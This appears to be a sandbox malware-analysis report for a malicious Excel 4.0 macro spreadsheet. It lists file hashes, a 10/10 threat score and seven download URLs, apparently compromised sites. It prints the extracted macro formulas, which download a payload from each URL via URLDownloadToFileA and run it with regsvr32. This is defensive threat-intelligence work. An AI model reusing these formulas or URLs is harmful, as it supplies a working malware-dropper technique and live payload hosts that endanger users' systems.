Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

eb482275c9...8.xlsm

windows7-x64

10

eb482275c9...8.xlsm

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    eb482275c9754d8cfe32b70f515ab21cb0dbe0a44a0dcb6bc20720b2462de498

  • Size

    35KB

  • Sample

    241120-3an3naweqn

  • MD5

    1553fa17f531fd2b7d2d1b76624374e1

  • SHA1

    063eda6f5c07a308df1c9f537179dba64cc7d50c

  • SHA256

    eb482275c9754d8cfe32b70f515ab21cb0dbe0a44a0dcb6bc20720b2462de498

  • SHA512

    704165ba1b90445cb34868eafab50e3ff3fcab6ba53a5982095244c453fd5e326a707a980dda45524b0370969a51d3b579c16e44fcf2adecf8448395752196cf

  • SSDEEP

    768:vrtDp5eCAjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooNQ3:vrtlgCUOZZ1ZYpoQ/pMAIY

Score
10/10
discoverymacroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

https://fikti.bem.gunadarma.ac.id/monon/OAH7XngpmWiT1vLkmP/

https://brutobrasil.com.br/pdf/SSscCUKBvL/

https://mdmd.fun/wp-includes/Y00y/

https://appanwendung.com/wp-admin/dvDn7/

https://hotel-boehmerwaldhof.at/wp-admin/mmhZydbNdqVxzc/

https://camaravotuporanga.sp.gov.br/conteudo/LFT3r6eLqdvHvD/

https://dnvqqk.cn/about/fW4aBbnaoOIDwjmpuqf/
Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://fikti.bem.gunadarma.ac.id/monon/OAH7XngpmWiT1vLkmP/","..\xdha.ocx",0,0) =IF('EGVSBSR'!C16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://brutobrasil.com.br/pdf/SSscCUKBvL/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://mdmd.fun/wp-includes/Y00y/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://appanwendung.com/wp-admin/dvDn7/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://hotel-boehmerwaldhof.at/wp-admin/mmhZydbNdqVxzc/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://camaravotuporanga.sp.gov.br/conteudo/LFT3r6eLqdvHvD/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C26<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dnvqqk.cn/about/fW4aBbnaoOIDwjmpuqf/","..\xdha.ocx",0,0)) =IF('EGVSBSR'!C28<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\xdha.ocx") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

https://fikti.bem.gunadarma.ac.id/monon/OAH7XngpmWiT1vLkmP/
xlm40.dropper

https://brutobrasil.com.br/pdf/SSscCUKBvL/
xlm40.dropper

https://mdmd.fun/wp-includes/Y00y/
xlm40.dropper

https://appanwendung.com/wp-admin/dvDn7/
xlm40.dropper

https://hotel-boehmerwaldhof.at/wp-admin/mmhZydbNdqVxzc/
xlm40.dropper

https://camaravotuporanga.sp.gov.br/conteudo/LFT3r6eLqdvHvD/
xlm40.dropper

https://dnvqqk.cn/about/fW4aBbnaoOIDwjmpuqf/

Targets

    • Target

      eb482275c9754d8cfe32b70f515ab21cb0dbe0a44a0dcb6bc20720b2462de498

    • Size

      35KB

    • MD5

      1553fa17f531fd2b7d2d1b76624374e1

    • SHA1

      063eda6f5c07a308df1c9f537179dba64cc7d50c

    • SHA256

      eb482275c9754d8cfe32b70f515ab21cb0dbe0a44a0dcb6bc20720b2462de498

    • SHA512

      704165ba1b90445cb34868eafab50e3ff3fcab6ba53a5982095244c453fd5e326a707a980dda45524b0370969a51d3b579c16e44fcf2adecf8448395752196cf

    • SSDEEP

      768:vrtDp5eCAjOZpqcVbZYpoRuBlIiOKMArOooooooooooooooooooooooooooNQ3:vrtlgCUOZZ1ZYpoQ/pMAIY

    Score
    10/10
    discovery
    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks